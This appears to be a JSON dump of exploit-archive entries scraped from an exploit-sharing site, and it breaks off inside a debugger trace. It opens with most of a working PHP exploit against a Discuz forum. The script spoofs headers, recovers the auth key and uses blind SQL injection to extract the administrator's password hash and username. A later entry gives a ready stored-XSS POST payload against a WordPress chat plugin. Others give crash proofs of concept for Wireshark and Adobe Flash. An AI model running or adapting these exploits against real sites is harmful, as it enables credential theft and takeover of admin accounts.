$i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n 
}\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\necho \"please wait...\\n\";\r\n\r\n//from global.func.php\r\nfunction authcode($string, $operation, $key = '') {\r\n\t$key = $key ? $key : $GLOBALS['discuz_auth_key'];\r\n\t$coded = '';\r\n\t$keylength = 32;\r\n\t$string = $operation == 'DECODE' ? base64_decode($string) : $string;\r\n \tfor($i = 0; $i < strlen($string); $i += 32) {\r\n\t\t$coded .= substr($string, $i, 32) ^ $key;\r\n\t}\r\n\t$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;\r\n\treturn $coded;\r\n}\r\n\r\n//stolen from install.php\r\nfunction random($length) {\r\n\t$hash = '';\r\n\t$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';\r\n\t$max = strlen($chars) - 1;\r\n\tmt_srand((double)microtime() * 1000000);\r\n\tfor($i = 0; $i < $length; $i++) {\r\n\t\t$hash .= $chars[mt_rand(0, $max)];\r\n\t}\r\n\treturn $hash;\r\n}\r\n\r\n$agent=\"Googlebot/2.1\";\r\n//see sql errors... 
you need auth key,\r\n//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)\r\n$tt=\"\";for ($i=0; $i<=255; $i++){$tt.=chr($i);}\r\nwhile (1)\r\n{\r\n $discuz_auth_key=random(32);\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin HTTP/1.0\\r\\n\";\r\n $packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n $html=html_entity_decode($html);\r\n $html=str_replace(\"<br />\",\"\",$html);\r\n $t=explode(\"AND m.password='\",$html);\r\n $t2=explode(\"' \",$t[1]);\r\n $pwd_f=$t2[0];\r\n $t=explode(\"AND m.secques='\",$html);\r\n $t2=explode(\"'\\n\",$t[1]);\r\n $secques_f=$t2[0];\r\n $t=explode(\"AND m.uid='\",$html);\r\n $t2=explode(\"'\\x0d\",$t[1]);\r\n $uid_f=$t2[0];\r\n $my_string=$pwd_f.\"\\t\".$secques_f.\"\\t\".$uid_f;\r\n if ((strlen($my_string)==270) and (!eregi(\"=\",$my_string))){\r\n break;\r\n }\r\n}\r\n$temp = authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\");\r\n//calculating key...\r\n$key=\"\";\r\nfor ($j=0; $j<32; $j++){\r\n for ($i=0; $i<255; $i++){\r\n $aa=\"\";\r\n if ($j<>0){\r\n for ($k=1; $k<=$j; $k++){\r\n $aa.=\"a\";\r\n }\r\n }\r\n $GLOBALS['discuz_auth_key']=$aa.chr($i);\r\n $t = authcode($temp,\"DECODE\");\r\n if ($t[$j]==$my_string[$j]){\r\n $key.=chr($i);\r\n }\r\n }\r\n}\r\n\r\n//echo \"AUTH KEY ->\".$key.\"\\r\\n\";\r\n$GLOBALS['discuz_auth_key']=$key;\r\n\r\necho \"pwd hash (md5) -> \";\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n if 
(in_array($i,$chars))\r\n {\r\n //you can use every char because of base64_decode()...so this bypass magic quotes...\r\n //and some help by extract() to overwrite vars\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $password.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n }\r\n if ($i==255) {\r\n die(\"\\nExploit failed...\");\r\n }\r\n }\r\n$j++;\r\n}\r\n\r\necho \"\\nadmin user -> \";\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n 
$admin.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n if ($i==255) {die(\"\\nExploit failed...\");}\r\n }\r\n$j++;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\nif (is_hash($password)) {\r\n echo \"exploit succeeded...\";\r\n}\r\nelse {\r\n echo \"exploit failed...\";\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-01] #"}
{"result": {"zdt": [{"lastseen": "2018-01-05T13:19:42", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-06-28T00:00:00", "title": "Adobe Flash - ATF Parser Heap Corruption Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T13:19:42", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:C/", "value": 6.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3078"], "modified": "2017-06-28T00:00:00", "id": "1337DAY-ID-28033", "href": "https://0day.today/exploit/description/28033", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1216\r\n \r\nThe attached file causes heap corruption in the ATF parser. To reproduce the issue, copy atffree.atf and LoadImage.swf to a server, and visit http://127.0.0.1/LoadImage.swf?img=atffree.png.\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28033"}, {"lastseen": "2018-04-10T07:42:08", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "OSS-Fuzz", "published": "2017-06-06T00:00:00", "title": "Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-10T07:42:08", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9347"], "modified": "2017-06-06T00:00:00", "id": "1337DAY-ID-27901", "href": "https://0day.today/exploit/description/27901", "sourceData": "Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637\r\n \r\nBuild Information:\r\nTShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)\r\n \r\nCopyright 1998-2017 Gerald Combs <[email\u00a0protected]> and contributors.\r\nLicense GPLv2+: GNU GPL version 2 or later 
<http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>\r\nThis is free software; see the source for copying conditions. There is NO\r\nwarranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n \r\nCompiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,\r\nwith GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua\r\n5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,\r\nwith nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.\r\n \r\nRunning on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz\r\n(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap\r\nversion 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.\r\n \r\nBuilt using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).\r\n--\r\nA problem was found by the oss-fuzz project:\r\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216\r\n \r\nAttached is the sample that triggers this error which can be reproduced with an\r\nASAN+UBSAN build of Wireshark (\"tshark -Vr test.pcap\").\r\n--\r\nepan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null\r\n/usr/include/string.h:395:33: note: nonnull attribute specified here\r\n #0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50\r\n #1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23\r\n #2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49\r\n #3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13\r\n #4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18\r\n #5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9\r\n #6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17\r\n #7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12\r\n #8 0x7fb585b4987e in dissect_ber_choice 
epan/dissectors/packet-ber.c:2901:21\r\n #9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12\r\n #10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9\r\n #11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13\r\n #12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5\r\n #13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9\r\n #17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13\r\n #18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9\r\n #19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13\r\n #20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7\r\n #24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10\r\n #25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9\r\n #29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21\r\n #30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8\r\n #33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8\r\n #34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5\r\n #35 
0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5\r\n #36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11\r\n #40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8\r\n #43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8\r\n #44 0x7fb58947a694 in dissect_record epan/packet.c:567:3\r\n #45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2\r\n #46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5\r\n #47 0x564f1828009e in load_cap_file tshark.c:3232:11\r\n #48 0x564f18277e7b in main tshark.c:1954:13\r\n #49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)\r\n #50 0x564f18165709 in _start (run/tshark+0xd1709)\r\n \r\nSUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27901"}, {"lastseen": "2018-03-01T23:44:02", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "Dennis Kerdijk", "published": "2016-08-01T00:00:00", "title": "WordPress WP Live Chat Support 6.2.03 Plugin - Persistent Cross-Site Scripting", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-01T23:44:02", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-08-01T00:00:00", "id": "1337DAY-ID-25206", "href": 
"https://0day.today/exploit/description/25206", "sourceData": "Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin\r\n \r\nAbstract\r\n \r\nA stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0010\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.\r\n \r\nFix\r\n \r\nThis issue is resolved in WP Live Chat Support version 6.2.04.\r\n \r\nIntroduction\r\n \r\nWP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. 
It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\n \r\nThe vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):\r\n \r\nwp-live-chat-support/wp-live-chat-support.php:\r\n \r\n600 if ($_POST['action'] == \"wplc_user_send_offline_message\") {\r\n601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }\r\n602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }\r\n603 do_action(\"wplc_hook_offline_message\",array(\r\n604 \"cid\"=>$_POST['cid'],\r\n605 \"name\"=>$_POST['name'],\r\n606 \"email\"=>$_POST['email'],\r\n607 \"url\"=>get_site_url(),\r\n608 \"msg\"=>$_POST['msg']\r\n609 )\r\n610 );\r\n611 }\r\n \r\nwp-live-chat-support/functions.php:\r\n \r\n1206 function wplc_store_offline_message($name, $email, $message){\r\n1207 global $wpdb;\r\n1208 global $wplc_tblname_offline_msgs;\r\n1209 \r\n1210 $wplc_settings = get_option('WPLC_SETTINGS');\r\n1211 \r\n1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){\r\n1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {\r\n1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n1215 } else {\r\n1216 $ip_address = $_SERVER['REMOTE_ADDR'];\r\n1217 }\r\n1218 $offline_ip_address = $ip_address;\r\n1219 } else {\r\n1220 $offline_ip_address = \"\";\r\n1221 }\r\n1222 \r\n1223 \r\n1224 $ins_array = array(\r\n1225 'timestamp' => current_time('mysql'),\r\n1226 'name' => $name,\r\n1227 'email' => $email,\r\n1228 'message' => $message,\r\n1229 'ip' => $offline_ip_address,\r\n1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']\r\n1231 );\r\n1232 \r\n1233 $rows_affected = 
$wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );\r\n1234 return;\r\n1235 }\r\n \r\nThe vulnerability can be exploited using a specially crafted POST request. The victim needs to view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted that the offline message functionality is available even if there is a logged on chat user present.\r\n \r\nProof of concept\r\n \r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: <target>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 361\r\nConnection: close\r\n \r\naction=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25206"}, {"lastseen": "2018-01-10T03:17:02", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-04-29T00:00:00", "title": "Wireshark - alloc_address_wmem Assertion Failure", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T03:17:02", "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N/", "value": 4.9}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-29T00:00:00", "id": "1337DAY-ID-25985", "href": "https://0day.today/exploit/description/25985", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=804\r\n \r\nThe following crash due to an assertion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut 
---\r\nERROR:./address.h:144:alloc_address_wmem: assertion failed: (addr_data == NULL)\r\n \r\nProgram received signal SIGABRT, Aborted.\r\n0x00007fffe13f5cc9 in __GI_raise ([email\u00a0protected]=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56\r\n56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.\r\n(gdb) where\r\n#0 0x00007fffe13f5cc9 in __GI_raise ([email\u00a0protected]=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56\r\n#1 0x00007fffe13f90d8 in __GI_abort () at abort.c:89\r\n#2 0x00007fffe2e8c165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0\r\n#3 0x00007fffe2e8c1fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0\r\n#4 0x00007fffeabea578 in alloc_address_wmem (scope=0x60700000c110, addr=0x7ffe9039af00, addr_type=22, \r\n addr_len=0, addr_data=0x7ffe9039acb0) at ./address.h:144\r\n#5 0x00007fffeabe3454 in copy_address_wmem (scope=0x60700000c110, to=0x7ffe9039af00, from=0x7ffe9039a920)\r\n at ./address.h:254\r\n#6 0x00007fffeabe2ec7 in conversation_new (setup_frame=10, addr1=0x7ffe9039a8e8, addr2=0x7ffe9039a920, \r\n ptype=PT_NONE, port1=0, port2=0, options=2) at conversation.c:701\r\n#7 0x00007fffebfe61a8 in get_peer_conversation (pinfo=0x61400000f058, tpt_conv_data=0x7ffe9039a8c0, create=1)\r\n at packet-jxta.c:800\r\n#8 0x00007fffebfda23d in dissect_jxta_stream (tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffff5f30) at packet-jxta.c:682\r\n#9 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:656\r\n#10 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffff5f30) at packet.c:731\r\n#11 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, 
data=0x7fffffff5f30) at packet.c:2764\r\n#12 0x00007fffeabe9336 in try_conversation_dissector (addr_a=0x61400000f118, addr_b=0x61400000f130, \r\n ptype=PT_TCP, port_a=32925, port_b=9711, tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffff5f30) at conversation.c:1323\r\n#13 0x00007fffecd90b6b in decode_tcp_ports (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, src_port=32925, dst_port=9711, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30)\r\n at packet-tcp.c:4981\r\n#14 0x00007fffecd96f1b in process_tcp_payload (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, src_port=32925, dst_port=9711, seq=145, nxtseq=3338, \r\n is_tcp_segment=1, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30) at packet-tcp.c:5085\r\n#15 0x00007fffecd91fcc in dissect_tcp_payload (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, offset=32, seq=145, \r\n nxtseq=3338, sport=32925, dport=9711, tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, tcpd=0x7ffe9039a3c0, \r\n tcpinfo=0x7fffffff5f30) at packet-tcp.c:5166\r\n#16 0x00007fffecda8229 in dissect_tcp (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7ffe8ff93880) at packet-tcp.c:6071\r\n#17 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7ffe8ff93880) at packet.c:656\r\n#18 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:731\r\n#19 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000093c40, uint_val=6, tvb=0x61d0001a6ed0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:1190\r\n#20 0x00007fffebe8733c in ip_try_dissect (heur_first=0, tvb=0x61d0001a6ed0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, 
iph=0x7ffe8ff93880) at packet-ip.c:1977\r\n#21 0x00007fffebe9214a in dissect_ip_v4 (tvb=0x61d0001a6140, pinfo=0x61400000f058, parent_tree=0x6190001500a0, \r\n data=0x0) at packet-ip.c:2476\r\n#22 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x0) at packet.c:656\r\n#23 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:731\r\n#24 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000052380, uint_val=2048, \r\n tvb=0x61d0001a6140, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:1190\r\n#25 0x00007fffeac548f5 in dissector_try_uint (sub_dissectors=0x61d000052380, uint_val=2048, tvb=0x61d0001a6140, \r\n pinfo=0x61400000f058, tree=0x6190001500a0) at packet.c:1216\r\n#26 0x00007fffeb97476a in dissect_ethertype (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffffa080) at packet-ethertype.c:257\r\n#27 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:656\r\n#28 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffa080) at packet.c:731\r\n#29 0x00007fffeac5ea1f in 